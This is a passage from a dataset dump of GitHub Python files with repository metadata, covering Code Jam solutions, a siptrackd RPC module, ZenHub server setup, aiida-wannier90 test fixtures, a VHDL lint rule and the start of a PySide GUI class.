f_solve):\n with open(file_name, 'r') as f:\n num_cases = int(f.readline())\n n, j = f.readline().split()\n return f_solve(n, j)\n\ndef solve_c(string_len, num_cases):\n output_str = \"Case #1:\\n\"\n num_string = '1' * int(string_len)\n num_cases = int(num_cases)\n while num_cases:\n non_triv_divs = get_nontrivial_divisors(num_string)\n while not all(non_triv_divs):\n print(\"going down...\", num_string)\n num_string = next_lowest_candidate(num_string)\n non_triv_divs = get_nontrivial_divisors(num_string)\n output_str += ' '.join([num_string] + \n non_triv_divs) + '\\n'\n print(\"got one!\", num_string)\n num_string = next_lowest_candidate(num_string)\n num_cases -= 1\n return output_str\n\ndef get_nontrivial_divisors(num_string):\n return [find_str_divisor(str_base_n_to_int(num_string, i))\n for i in range(2, 11)]\n\ndef next_lowest_candidate(num_string):\n return '1' + int_to_str_binary(\n str_base_n_to_int(num_string[1:-1], 2) - 1) + '1'\n\ndef str_base_n_to_int(input_str, base):\n return sum(int(input_str[x]) * (base ** \n (len(input_str) - 1 - x))\n for x in range(len(input_str)))\n\ndef int_to_str_binary(input_num):\n output_str = \"\"\n while input_num:\n input_num, i = divmod(input_num, 2)\n output_str = str(i) + output_str\n return output_str\n\ndef find_str_divisor(n):\n import math\n for i in xrange(2, 10000): #int(math.sqrt(n))):\n if n % i == 0:\n return str(i)\n return None\n\ndef solve_d(input_str):\n k, c, s = (int(x) for x in input_str.split())\n if c == 1:\n if s < k:\n return \"IMPOSSIBLE\"\n else:\n return ' '.join(str(x+1) for x in range(k))\n elif c > 1 and s < k / float(2):\n return \"IMPOSSIBLE\"\n else:\n output_list = [(2 * k * x) + (2 * (x + 1)) for x in range((k + 1) // 2)]\n if k % 2:\n output_list[-1] -= 1\n # Checking stuff\n #for x in get_all_single_gold(k, c):\n # solved = False\n # for y in output_list:\n # if y > len(x):\n 
# print(\"OVERSIZE!\", x, len(x), y, input_str)\n # if x[y-1] == 'G':\n # solved = True\n # if not solved:\n # print(\"NOT SOLVED!\", input_str, x, output_list)\n # Return\n return ' '.join(str(x) for x in output_list)\n\n\ndef get_all_single_gold(k, c):\n for i in range(k):\n pattern = ('L' * i) + 'G' + ('L' * (k - 1 - i))\n complex_pattern = pattern\n for j in range(c-1):\n complex_pattern = apply_complexity_plus_one(complex_pattern, pattern)\n yield complex_pattern\n\ndef apply_complexity_plus_one(last_complexity, orig_pattern):\n return ''.join({'G': len(orig_pattern) * 'G', 'L': orig_pattern}[x] for x in last_complexity)\n\n\n\nif __name__ == \"__main__\":\n #output_str = answer_problem(sys.argv[1], solve_a)\n #output_str = answer_problem(sys.argv[1], solve_b)\n #output_str = answer_problem_special(sys.argv[1], solve_c)\n output_str = answer_problem(sys.argv[1], solve_d)\n with open(sys.argv[1].replace('.in', '.out'), 'w') as f:\n f.write(output_str)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_180/920.py","file_name":"920.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26800950350","text":"from twisted.web import xmlrpc\nfrom twisted.internet import defer\nimport xmlrpclib\n\nfrom siptrackdlib import container\nfrom siptrackdlib import errors\n\nfrom siptrackd_twisted import helpers\nfrom siptrackd_twisted import gatherer\nfrom siptrackd_twisted import baserpc\n\nclass ContainerTreeRPC(baserpc.BaseRPC):\n node_type = 'container tree'\n\n @helpers.ValidateSession()\n @defer.inlineCallbacks\n def xmlrpc_add(self, session, parent_oid):\n \"\"\"Create a new container tree.\"\"\"\n parent = self.object_store.getOID(parent_oid, user = session.user)\n obj = parent.add(session.user, 'container tree')\n yield self.object_store.commit(obj)\n defer.returnValue(obj.oid)\n\nclass ContainerRPC(baserpc.BaseRPC):\n node_type = 'container'\n\n @helpers.ValidateSession()\n @defer.inlineCallbacks\n def xmlrpc_add(self, session, parent_oid):\n \"\"\"Create a new container.\"\"\"\n parent = self.object_store.getOID(parent_oid, user = session.user)\n obj = parent.add(session.user, 'container')\n yield self.object_store.commit(obj)\n defer.returnValue(obj.oid)\n\ngatherer.node_data_registry.register(container.ContainerTree,\n gatherer.no_data_extractor)\ngatherer.node_data_registry.register(container.Container,\n gatherer.no_data_extractor)\n","repo_name":"sii/siptrackd","sub_path":"siptrackd_twisted/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23638271741","text":"import sys\r\nfi = open(sys.argv[1])\r\nfo = open(sys.argv[2], 'w')\r\nfr = fi.readline\r\n\r\nT = int(fr())\r\nfor t in xrange(T):\r\n tmp = map(int, fr().split())\r\n N, S, p = tmp[:3]\r\n tt = tmp[3:]\r\n tt.sort(reverse=True)\r\n res = 0\r\n for i in tt:\r\n if (i+2)/3 >= p:\r\n res += 1\r\n elif i <= 2:\r\n if i >= p and S != 0:\r\n S -= 1\r\n res += 1\r\n elif (i+4)/3 >= p:\r\n if S != 0:\r\n S -= 1\r\n res += 1\r\n else:\r\n break\r\n fo.write(\"Case #%d: %d\\n\" % (t+1, res))\r\nfo.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/1393.py","file_name":"1393.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"30931028521","text":"\"\"\"table of mean ccc for xgb/rf classifiers across 500 test datasets\"\"\"\r\nimport pandas as pd\r\nimport os\r\n\r\ndate = \"2020_05_07\"\r\nint_cause = \"x59\"\r\nmodel_dir = f\"/ihme/cod/prep/mcod/process_data/{int_cause}/thesis/{date}\"\r\n\r\nall_df = []\r\nfor short_name in [\"xgb\", \"rf\"]:\r\n dfs = []\r\n for root, dirs, files in os.walk(os.path.join(\r\n os.path.join(model_dir, short_name))):\r\n for stats_dir in dirs:\r\n if os.path.exists(os.path.join(\r\n model_dir, short_name, stats_dir, \"summary_stats.csv\")):\r\n df = pd.read_csv(os.path.join(\r\n model_dir, short_name, stats_dir, \"summary_stats.csv\"))\r\n df[\"model_params\"] = stats_dir\r\n else:\r\n df = pd.DataFrame()\r\n df[\"model_params\"] = stats_dir\r\n dfs.append(df)\r\n df = pd.concat(dfs, sort=True, ignore_index=True)\r\n df = df.sort_values(by=\"mean_test_concordance\",\r\n ascending=False)[[\"model_params\" ,\"mean_test_concordance\"]]\r\n df[\"short_name\"] = short_name\r\n all_df.append(df)\r\nalls = pd.concat(all_df, sort=True, ignore_index=True)\r\n\r\nalls.to_csv(f\"/home/j/temp/agesak/thesis/model_results/{date}/{date}_{int_cause}_xgb_rf_summary.csv\", index=False)","repo_name":"agesak/thesis","sub_path":"misc/training_summaries.py","file_name":"training_summaries.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17613438393","text":"from __future__ import absolute_import\n\nfrom twisted.cred import portal\nfrom twisted.internet.endpoints import serverFromString\nfrom zope.component import getUtility\n\nfrom Products.ZenUtils.PBUtil import setKeepAlive\n\nfrom .auth import HubRealm\nfrom .avatar import HubAvatar\nfrom .broker import ZenPBServerFactory\nfrom .interface import IHubServerConfig\nfrom .router import ServiceCallRouter\nfrom .service import (\n ServiceLoader,\n ServiceManager,\n ServiceReferenceFactory,\n ServiceRegistry,\n WorkerInterceptor,\n)\nfrom .utils import import_name, TCPDescriptor\nfrom .workerpool import WorkerPool\n\n\n# Global reference to _executor instances\n_executors = {}\n\n\ndef start_server(reactor, server_factory):\n \"\"\"Start the PerspectiveBroker server.\n\n :param reactor: The Twisted reactor.\n :param server_factory: Used by Twisted to create PB server.\n :type server_factory: .broker.ZenPBServerFactory\n \"\"\"\n # Start the executors:\n global _executors\n for executor in _executors.values():\n executor.start(reactor)\n\n # Retrieve the server config object.\n config = getUtility(IHubServerConfig)\n\n # Build the network descriptor for the PerspectiveBroker server.\n pb_descriptor = TCPDescriptor.with_port(config.pbport)\n\n # Construct the PerspectiveBroker server\n pb_server = serverFromString(reactor, pb_descriptor)\n\n # Begin listening\n dfr = pb_server.listen(server_factory)\n\n # set the keep-alive config on the server's listening socket\n dfr.addCallback(lambda listener: setKeepAlive(listener.socket))\n\n\ndef stop_server():\n # Stop the executors:\n global _executors\n for executor in _executors.values():\n executor.stop()\n\n\ndef make_server_factory(pools, manager, authenticators):\n \"\"\"Return a ZenPBServerFactory instance.\n\n :param service_registry: Registry of loaded ZenHub services\n :type service_registry: Mapping[str, HubServer]\n :param authenticators: Used to authenticate clients.\n :type authenticators: Sequence[Authenticator]\n \"\"\"\n # Build the authentication pieces\n avatar = 
HubAvatar(manager, pools)\n realm = HubRealm(avatar)\n hubportal = portal.Portal(realm, authenticators)\n\n # Return the initialized Perspective Broker server factory.\n return ZenPBServerFactory(hubportal)\n\n\ndef make_service_manager(pools):\n # Retrieve the server config object.\n config = getUtility(IHubServerConfig)\n\n registry = ServiceRegistry()\n routes = ServiceCallRouter.from_config(config.routes)\n\n # Build the executors;\n # returns a dict having : \n executors = make_executors(config, pools)\n\n # Build the ZenHub service manager\n loader = ServiceLoader()\n factory = ServiceReferenceFactory(WorkerInterceptor, routes, executors)\n return ServiceManager(registry, loader, factory)\n\n\ndef make_pools():\n # Retrieve the server config object.\n config = getUtility(IHubServerConfig)\n # Registry of references to zenhubworker connections\n # : WorkerPool\n return {name: WorkerPool(name) for name in config.pools.keys()}\n\n\ndef make_executors(config, pools):\n global _executors\n for name, spec in config.executors.items():\n modpath, clsname = spec.split(\":\", 1)\n cls = import_name(modpath, clsname)\n executor = cls.create(name, config=config, pool=pools.get(name))\n _executors[name] = executor\n return _executors\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenHub/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"22605198762","text":"import collections\nimport os\nimport shutil\nimport tempfile\nimport types\n\nimport pytest\n\npytest_plugins = [\"aiida.manage.tests.pytest_fixtures\"]\n\n\n@pytest.fixture(scope=\"function\")\ndef fixture_sandbox():\n \"\"\"Return a `SandboxFolder`.\"\"\"\n from aiida.common.folders import SandboxFolder\n\n with SandboxFolder() as folder:\n yield folder\n\n\n@pytest.fixture\ndef fixture_localhost(aiida_localhost):\n \"\"\"Return a localhost `Computer`.\"\"\"\n localhost = aiida_localhost\n localhost.set_default_mpiprocs_per_machine(1)\n return localhost\n\n\n@pytest.fixture\ndef fixture_code(fixture_localhost):\n \"\"\"Return a `Code` instance configured to run calculations of given entry point on localhost `Computer`.\"\"\"\n\n def _fixture_code(entry_point_name):\n from aiida.orm import Code\n\n return Code(\n input_plugin_name=entry_point_name,\n remote_computer_exec=[fixture_localhost, \"/bin/true\"],\n )\n\n return _fixture_code\n\n\n@pytest.fixture\ndef fixture_remotedata(fixture_localhost, shared_datadir):\n \"\"\"Return a `RemoteData` with contents from the specified directory.\n\n Optionally a mapping of strings to replace in the filenames can be passed. 
Note that the order\n of replacement is not guaranteed.\n\n The RemoteData node is yielded and points to a folder in /tmp, and is removed at the end.\n \"\"\"\n from aiida.orm import RemoteData\n\n replacement_mapping = {\"gaas\": \"aiida\"}\n dir_path = shared_datadir / \"gaas\"\n\n with tempfile.TemporaryDirectory() as tmpdir:\n remote = RemoteData(remote_path=tmpdir, computer=fixture_localhost)\n for file_path in dir_path.iterdir():\n abs_path = str(file_path.resolve())\n res_file_path = os.path.join(tmpdir, file_path.name)\n for old, new in replacement_mapping.items():\n res_file_path = res_file_path.replace(old, new)\n shutil.copyfile(src=abs_path, dst=res_file_path)\n yield remote\n\n\n@pytest.fixture\ndef fixture_folderdata():\n \"\"\"Return a `FolderData` with contents from the specified directory.\n\n Optionally a mapping of strings to replace in the filenames can be passed. Note that the order\n of replacement is not guaranteed.\n \"\"\"\n\n def _fixture_folderdata(dir_path, replacement_mapping=types.MappingProxyType({})):\n from aiida.orm import FolderData\n\n folder = FolderData()\n for file_path in os.listdir(dir_path):\n abs_path = os.path.abspath(os.path.join(dir_path, file_path))\n res_file_path = file_path\n for old, new in replacement_mapping.items():\n res_file_path = res_file_path.replace(old, new)\n folder.base.repository.put_object_from_file(abs_path, res_file_path)\n return folder\n\n return _fixture_folderdata\n\n\n@pytest.fixture\ndef generate_calc_job():\n \"\"\"Fixture to construct a new `CalcJob` instance and call `prepare_for_submission` for testing `CalcJob` classes.\n\n The fixture will return the `CalcInfo` returned by `prepare_for_submission` and the temporary folder that was passed\n to it, into which the raw input files will have been written.\n \"\"\"\n\n def _generate_calc_job(folder, entry_point_name, inputs=None):\n \"\"\"Fixture to generate a mock `CalcInfo` for testing calculation jobs.\"\"\"\n from aiida.engine.utils import instantiate_process\n from aiida.manage.manager import get_manager\n from aiida.plugins import CalculationFactory\n\n manager = get_manager()\n runner = manager.get_runner()\n\n process_class = CalculationFactory(entry_point_name)\n process = instantiate_process(runner, process_class, **inputs)\n\n calc_info = process.prepare_for_submission(folder)\n\n return calc_info\n\n return _generate_calc_job\n\n\n@pytest.fixture\ndef generate_calc_job_node(shared_datadir):\n \"\"\"Fixture to generate a mock `CalcJobNode` for testing parsers.\"\"\"\n\n def flatten_inputs(inputs, prefix=\"\"):\n \"\"\"Flatten inputs recursively like :meth:`aiida.engine.processes.process::Process._flatten_inputs`.\"\"\"\n flat_inputs = []\n for key, value in inputs.items():\n if isinstance(value, collections.abc.Mapping):\n flat_inputs.extend(flatten_inputs(value, prefix=prefix + key + \"__\"))\n else:\n flat_inputs.append((prefix + key, value))\n return flat_inputs\n\n def _generate_calc_job_node( # pylint: disable=too-many-arguments\n entry_point_name,\n computer,\n seedname=None,\n test_name=None,\n inputs=None,\n attributes=None,\n ):\n \"\"\"Fixture to generate a mock `CalcJobNode` for testing parsers.\n\n :param entry_point_name: entry point name of the calculation class\n :param computer: a `Computer` instance\n :param test_name: relative path of directory with test output files in the `fixtures/{entry_point_name}` folder.\n :param inputs: any optional nodes to add as input links to the current CalcJobNode\n :param attributes: any optional attributes 
to set on the node\n :return: `CalcJobNode` instance with an attached `FolderData` as the `retrieved` node\n \"\"\"\n from aiida import orm\n from aiida.common import LinkType\n from aiida.plugins.entry_point import format_entry_point_string\n\n entry_point = format_entry_point_string(\"aiida.calculations\", entry_point_name)\n\n # If no seedname is specified, use the default 'aiida'\n evaluated_seedname = seedname or \"aiida\"\n node = orm.CalcJobNode(computer=computer, process_type=entry_point)\n node.base.attributes.set(\"input_filename\", f\"{evaluated_seedname}.win\")\n node.base.attributes.set(\"output_filename\", f\"{evaluated_seedname}.wout\")\n node.base.attributes.set(\"error_filename\", f\"{evaluated_seedname}.werr\")\n node.set_option(\"resources\", {\"num_machines\": 1, \"num_mpiprocs_per_machine\": 1})\n node.set_option(\"max_wallclock_seconds\", 1800)\n node.set_option(\"seedname\", evaluated_seedname)\n\n if attributes:\n node.set_attribute_many(attributes)\n\n if inputs:\n for link_label, input_node in flatten_inputs(inputs):\n input_node.store()\n node.base.links.add_incoming(\n input_node, link_type=LinkType.INPUT_CALC, link_label=link_label\n )\n\n node.store()\n\n if test_name is not None:\n filepath = str(shared_datadir / test_name)\n\n retrieved = orm.FolderData()\n retrieved.base.repository.put_object_from_tree(filepath)\n retrieved.base.links.add_incoming(\n node, link_type=LinkType.CREATE, link_label=\"retrieved\"\n )\n retrieved.store()\n\n remote_folder = orm.RemoteData(computer=computer, remote_path=\"/tmp\")\n remote_folder.base.links.add_incoming(\n node, link_type=LinkType.CREATE, link_label=\"remote_folder\"\n )\n remote_folder.store()\n\n return node\n\n return _generate_calc_job_node\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_parser():\n \"\"\"Fixture to load a parser class for testing parsers.\"\"\"\n\n def _generate_parser(entry_point_name):\n \"\"\"Fixture to load a parser class for testing parsers.\n\n :param entry_point_name: entry point name of the parser class\n :return: the `Parser` sub class\n \"\"\"\n from aiida.plugins import ParserFactory\n\n return ParserFactory(entry_point_name)\n\n return _generate_parser\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_structure_gaas():\n \"\"\"Return a `StructureData` representing bulk GaAs.\"\"\"\n\n def _generate_structure():\n \"\"\"Return a `StructureData` representing bulk GaAs.\"\"\"\n\n from aiida import orm\n\n param = 2.84\n structure = orm.StructureData(\n cell=[[-param, 0, param], [0, param, param], [-param, param, 0]]\n )\n\n structure.append_atom(symbols=\"Ga\", position=[0, 0, 0])\n structure.append_atom(\n symbols=\"As\", position=[-0.5 * param, 0.5 * param, 0.5 * param]\n )\n return structure\n\n return _generate_structure\n\n\n@pytest.fixture\ndef generate_win_params_gaas(generate_structure_gaas, generate_kpoints_mesh):\n \"\"\"Generate parameters for GaAs.\"\"\"\n\n def _generate_win_params_gaas(\n projections_dict=types.MappingProxyType(\n {\"kind_name\": \"As\", \"ang_mtm_name\": \"sp3\"}\n )\n ):\n from aiida import orm\n from aiida.tools import get_kpoints_path\n\n from aiida_wannier90.orbitals import generate_projections\n\n projections_dict_mutable = {**projections_dict}\n structure = generate_structure_gaas()\n inputs = {\n \"structure\": structure,\n \"kpoints\": generate_kpoints_mesh(2),\n \"kpoint_path\": get_kpoints_path(structure, method=\"legacy\")[\"parameters\"],\n \"parameters\": orm.Dict(\n dict={\"num_wann\": 4, \"num_iter\": 12, \"wvfn_formatted\": 
True}\n ),\n \"projections\": generate_projections(\n projections_dict_mutable, structure=structure\n ),\n }\n\n return inputs\n\n return _generate_win_params_gaas\n\n\n@pytest.fixture\ndef generate_kpoints_mesh():\n \"\"\"Return a `KpointsData` node.\"\"\"\n\n def _generate_kpoints_mesh(npoints):\n \"\"\"Return a `KpointsData` with a mesh of npoints in each direction.\"\"\"\n from aiida.orm import KpointsData\n\n kpoints = KpointsData()\n kpoints.set_kpoints_mesh([npoints] * 3)\n\n return kpoints\n\n return _generate_kpoints_mesh\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_structure_o2sr():\n \"\"\"Return a `StructureData` representing bulk O2Sr.\"\"\"\n\n def _generate_structure():\n \"\"\"Return a `StructureData` representing bulk O2Sr.\"\"\"\n\n from aiida import orm\n\n structure = orm.StructureData(\n cell=[\n [-1.7828864010, 1.7828864010, 3.3905324933],\n [1.7828864010, -1.7828864010, 3.3905324933],\n [1.7828864010, 1.7828864010, -3.3905324933],\n ]\n )\n\n structure.append_atom(symbols=\"Sr\", position=[0, 0, 0])\n structure.append_atom(\n symbols=\"O\", position=[1.7828864010, 1.7828864010, 0.7518485043]\n )\n structure.append_atom(symbols=\"O\", position=[0, 0, 2.6386839890])\n return structure\n\n return _generate_structure\n\n\n@pytest.fixture\ndef generate_win_params_o2sr(generate_structure_o2sr, generate_kpoints_mesh):\n \"\"\"Generate parameters for O2Sr.\"\"\"\n\n def _generate_win_params_o2sr():\n from aiida import orm\n\n structure = generate_structure_o2sr()\n inputs = {\n \"structure\": structure,\n \"kpoints\": generate_kpoints_mesh(9),\n \"kpoint_path\":\n # To avoid dependency on seekpath, I paste here the result of\n # get_kpoints_path(structure)['parameters']\n orm.Dict(\n dict={\n \"point_coords\": {\n \"GAMMA\": [0.0, 0.0, 0.0],\n \"M\": [0.5, 0.5, -0.5],\n \"X\": [0.0, 0.0, 0.5],\n \"P\": [0.25, 0.25, 0.25],\n \"N\": [0.0, 0.5, 0.0],\n \"S_0\": [\n -0.3191276083914903,\n 0.3191276083914903,\n 0.3191276083914903,\n ],\n \"S\": [\n 0.3191276083914903,\n 0.6808723916085098,\n -0.3191276083914903,\n ],\n \"R\": [-0.1382552167829806, 0.1382552167829806, 0.5],\n \"G\": [0.5, 0.5, -0.1382552167829806],\n },\n \"path\": [\n (\"GAMMA\", \"X\"),\n (\"X\", \"P\"),\n (\"P\", \"N\"),\n (\"N\", \"GAMMA\"),\n (\"GAMMA\", \"M\"),\n (\"M\", \"S\"),\n (\"S_0\", \"GAMMA\"),\n (\"X\", \"R\"),\n (\"G\", \"M\"),\n ],\n }\n ),\n \"parameters\": orm.Dict(\n dict={\n \"num_wann\": 21,\n \"num_bands\": 31,\n \"num_iter\": 200,\n \"bands_plot\": True,\n \"auto_projections\": True,\n }\n ),\n }\n\n return inputs\n\n return _generate_win_params_o2sr\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_structure_ca4mg8():\n \"\"\"Return a `StructureData` representing bulk Ca4Mg8.\"\"\"\n\n def _generate_structure():\n \"\"\"Return a `StructureData` representing bulk Ca4Mg8.\"\"\"\n\n from aiida import orm\n\n structure = orm.StructureData(\n cell=[\n [3.1235488629, -5.4101154125, 0.0000000000],\n [3.1235488629, 5.4101154125, 0.0000000000],\n [0.0000000000, 0.0000000000, 10.0402257142],\n ]\n )\n\n structure.append_atom(\n symbols=\"Ca\", position=[3.1235488629, 7.2135064307, 5.6428504986]\n )\n structure.append_atom(\n symbols=\"Ca\", position=[3.1235488629, 3.6067243943, 4.3973752156]\n )\n structure.append_atom(\n symbols=\"Ca\", position=[3.1235488629, 3.6067243943, 0.6227376415]\n )\n structure.append_atom(\n symbols=\"Ca\", position=[3.1235488629, 7.2135064307, 9.4174880727]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[3.1235488629, 0.0000000000, 5.0201128571]\n 
)\n structure.append_atom(\n symbols=\"Mg\", position=[3.1235488629, 0.0000000000, 0.0000000000]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[1.5416212587, 9.9069482534, 7.5301692857]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[3.1235488629, 1.8266571732, 7.5301692857]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[4.7054764671, 9.9069482534, 7.5301692857]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[4.7054764671, 0.9132825716, 2.5100564285]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[3.1235488629, 8.9935736518, 2.5100564285]\n )\n structure.append_atom(\n symbols=\"Mg\", position=[1.5416212587, 0.9132825716, 2.5100564285]\n )\n return structure\n\n return _generate_structure\n\n\n@pytest.fixture\ndef generate_win_params_ca4mg8(\n generate_structure_ca4mg8,\n):\n \"\"\"Generate parameters for Ca4Mg8.\"\"\"\n\n def _generate_win_params_ca4mg8():\n from aiida import orm\n\n structure = generate_structure_ca4mg8()\n kpoints = orm.KpointsData()\n kpoints.set_kpoints_mesh([6, 6, 4])\n inputs = {\n \"structure\": structure,\n \"kpoints\": kpoints,\n \"parameters\": orm.Dict(\n dict={\n \"num_wann\": 72,\n \"num_bands\": 86,\n \"num_iter\": 400,\n \"auto_projections\": True,\n }\n ),\n }\n\n return inputs\n\n return _generate_win_params_ca4mg8\n\n\n@pytest.fixture(scope=\"session\")\ndef generate_structure_br2fe():\n \"\"\"Return a `StructureData` representing bulk Br2Fe.\"\"\"\n\n def _generate_structure():\n \"\"\"Return a `StructureData` representing bulk Br2Fe.\"\"\"\n\n from aiida import orm\n\n structure = orm.StructureData(\n cell=[\n [3.1218481617, 1.8023993833, 0.0000000000],\n [-3.1218481617, 1.8023993833, 0.0000000000],\n [-0.0010222890, 0.0000000000, 6.6558096562],\n ]\n )\n\n structure.append_atom(\n symbols=\"Fe\", position=[0.0000000000, 0.0000000000, 0.0000000000]\n )\n structure.append_atom(\n symbols=\"Br\", position=[5.2020635002, 1.8023993833, 5.3570235967]\n )\n structure.append_atom(\n symbols=\"Br\", position=[4.1624586959, 0.0000000000, 1.2987860595]\n )\n return structure\n\n return _generate_structure\n\n\n@pytest.fixture\ndef generate_win_params_br2fe(\n generate_structure_br2fe,\n):\n \"\"\"Generate parameters for Br2Fe.\"\"\"\n\n def _generate_win_params_br2fe():\n from aiida import orm\n\n structure = generate_structure_br2fe()\n kpoints = orm.KpointsData()\n kpoints.set_kpoints_mesh([11, 11, 5])\n inputs = {\n \"structure\": structure,\n \"kpoints\": kpoints,\n \"parameters\": orm.Dict(\n dict={\n \"num_wann\": 17,\n \"num_bands\": 21,\n \"num_iter\": 400,\n \"auto_projections\": True,\n }\n ),\n }\n\n return inputs\n\n return _generate_win_params_br2fe\n","repo_name":"aiidateam/aiida-wannier90","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":17094,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"22946462863","text":"\nfrom vsg.rules import token_case_with_prefix_suffix\n\nfrom vsg import token\n\nlTokens = []\nlTokens.append(token.procedure_specification.designator)\n\n\nclass rule_501(token_case_with_prefix_suffix):\n '''\n This rule checks the procedure designator has proper case.\n\n |configuring_uppercase_and_lowercase_rules_link|\n\n **Violation**\n\n .. code-block:: vhdl\n\n procedure AVERAGE_SAMPLES is\n\n **Fix**\n\n .. 
code-block:: vhdl\n\n procedure average_samples is\n '''\n\n def __init__(self):\n token_case_with_prefix_suffix.__init__(self, 'procedure', '501', lTokens)\n self.groups.append('case::name')\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/rules/procedure/rule_501.py","file_name":"rule_501.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"} +{"seq_id":"23569292071","text":"from functools import lru_cache\r\nfrom collections import Counter\r\n\r\nt = int(input())\r\n\r\n\r\ndef problem():\r\n inp = input().split()\r\n n = int(inp[0])\r\n k = int(inp[1])\r\n level = len(bin(k)[3:])\r\n values = get_values_on_level(n, level+1)\r\n keys = sorted(values.keys(), key=lambda v: v[1], reverse=True)\r\n remainder = k - ((2**level)-1)\r\n for key in keys:\r\n count = values[key]\r\n if count >= remainder:\r\n return key\r\n else:\r\n remainder -= count\r\n\r\n\r\n@lru_cache(maxsize=None)\r\ndef get_values_on_level(size2, level):\r\n l = size2 // 2\r\n if size2 % 2 == 0 and size2 != 0:\r\n r = (size2 // 2) - 1\r\n else:\r\n r = size2 // 2\r\n if level == 1:\r\n return {(l, r): 1}\r\n else:\r\n return Counter(get_values_on_level(l, level - 1)) + Counter(get_values_on_level(r, level - 1))\r\n\r\n\r\nfor i in range(1, t + 1):\r\n stats = problem()\r\n print(\"Case #{}: {} {}\".format(i, stats[0], stats[1]))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/209.py","file_name":"209.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75010965634","text":"x1,y1,x2,y2,x3,y3 = eval(input(\"enter the three points of the triangle:\"))\r\n# side lengths from the Euclidean distance formula: sqrt((x1-x2)^2 + (y1-y2)^2)\r\nside1 = ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5\r\n\r\nside2 = ((x2 - x3) ** 2 + (y2 - y3) ** 2) ** 0.5\r\n\r\nside3 = ((x1 - x3) ** 2 + (y1 - y3) ** 2) ** 0.5\r\ns = float(side1+side2+side3)/2\r\narea = ( s * (s-side1) * (s-side2) * (s-side3))**0.5\r\n\r\nprint(\"The area of the triangle is\",area)","repo_name":"Arshdeep-kapoor/Python","sub_path":"chapter2-ques14.py","file_name":"chapter2-ques14.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8594955026","text":"# -*- coding: utf-8 -*-\n#\n# @author: Five\n# Created on 2013-5-14\n#\nfrom string import lower\n\nclass Gender(object):\n M = 'M'\n F = 'F'\n U = 'U'\n choices = (M, F, U)\n\n\nclass Boolean(object):\n YES = '1'\n NO = '0'\n choices = (YES, NO)\n \n \nclass Currency(object):\n \n USD = ('USD', 'USD')\n CAD = ('CAD', 'CAD')\n \n choices = (USD, CAD)\n \nclass FileType(object):\n \n ZIP = 'zip'\n TXT = 'txt'\n CSV = 'csv'\n \n @staticmethod\n def is_zip(ext):\n return lower(ext) == FileType.ZIP\n \n \n choices = (ZIP, TXT, CSV)\n","repo_name":"IamFive/reliam2","sub_path":"reliam/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25995768912","text":"from collections import namedtuple\n\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nfrom guis.g_quotation import GQuotation\nfrom guis.g_panel import GPanel\nfrom guis.g_price_bar_chart import GPriceBarChart\nfrom my_qt.buttons import CheckableMenuButton\nfrom my_qt.charts import PriceBarChart\nfrom my_qt.date_edits import NoWheelDateEdit\nfrom my_qt.combo_boxes import SearchCombo\nfrom 
my_qt.spin_boxes import NoWheelSpinBox, NoWheelDoubleSpinBox\nfrom resources import url_back, url_save, url_plus, url_minus\nfrom utilities.various import color_gray, color_red\n\n\nclass GPanelQuotation(GPriceBarChart, GPanel, GQuotation):\n def __init__(self, window):\n super(GPriceBarChart, self).__init__()\n super(GPanel, self).__init__(window)\n\n self.setup_gui()\n\n # Edited: SearchCombo, NoWheelSpinBox, NoWheelDoubleSpinBox, NoWheelDateEdit, PriceBarChartView(+delete below)\n def setup_gui(self):\n self.w.centralWidget = QtWidgets.QWidget(self.w)\n self.w.centralWidget.setObjectName('centralWidget')\n self.w.verticalLayout = QtWidgets.QVBoxLayout(self.w.centralWidget)\n self.w.verticalLayout.setSpacing(16)\n self.w.verticalLayout.setObjectName('verticalLayout')\n self.w.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout_3.setObjectName('horizontalLayout_3')\n self.w.buttonBack = QtWidgets.QPushButton(self.w.centralWidget)\n self.w.buttonBack.setMinimumSize(QtCore.QSize(50, 40))\n self.w.buttonBack.setMaximumSize(QtCore.QSize(50, 